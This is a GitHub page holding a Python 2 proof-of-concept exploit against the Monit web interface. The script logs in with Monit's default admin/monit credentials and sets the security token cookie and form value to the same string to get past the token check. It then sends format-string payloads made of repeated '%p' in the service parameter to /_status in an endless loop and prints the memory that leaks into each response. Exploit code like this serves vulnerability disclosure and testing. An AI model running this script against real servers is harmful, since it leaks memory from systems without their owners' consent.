-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmonit_buffer_overread.py
40 lines (34 loc) · 1.38 KB
/
monit_buffer_overread.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import requests
import argparse
import base64
import socket
import random
from time import sleep
parser = argparse.ArgumentParser(description='Example: ./monit_buffer_overread.py http://127.0.0.1:2812 -username admin -password monit')
parser.add_argument('url', type=str, nargs=1,
help='url to target')
parser.add_argument('-username', type=str, nargs=1, default=['admin'],
help='monit username, defaults to admin')
parser.add_argument('-password', type=str, nargs=1, default=['monit'],
help='monit password, defaults to monit')
args = parser.parse_args()
auth_header = 'Basic ' + base64.b64encode(args.username[0] + ':' + args.password[0])
headers = {'Authorization': auth_header, 'Cookie': 'securitytoken=a'}
def generateData():
number = random.randint(1,60)
payload = "aaa" + " %p" * number
data = ('action=exec&service=' + payload + '&securitytoken=a')
return data
print("[x] POC will loop forever. Press CTRL-C to exit")
sleep(2)
while True:
try:
sleep(0.15)
print("[*] Sending request")
r = requests.post(args.url[0] + '/_status', headers=headers,data=generateData())
print("[*] Response contains: "+ r.content.split("aaa")[1].split("not found")[0])
except requests.exceptions.RequestException as e:
print e
exit(1)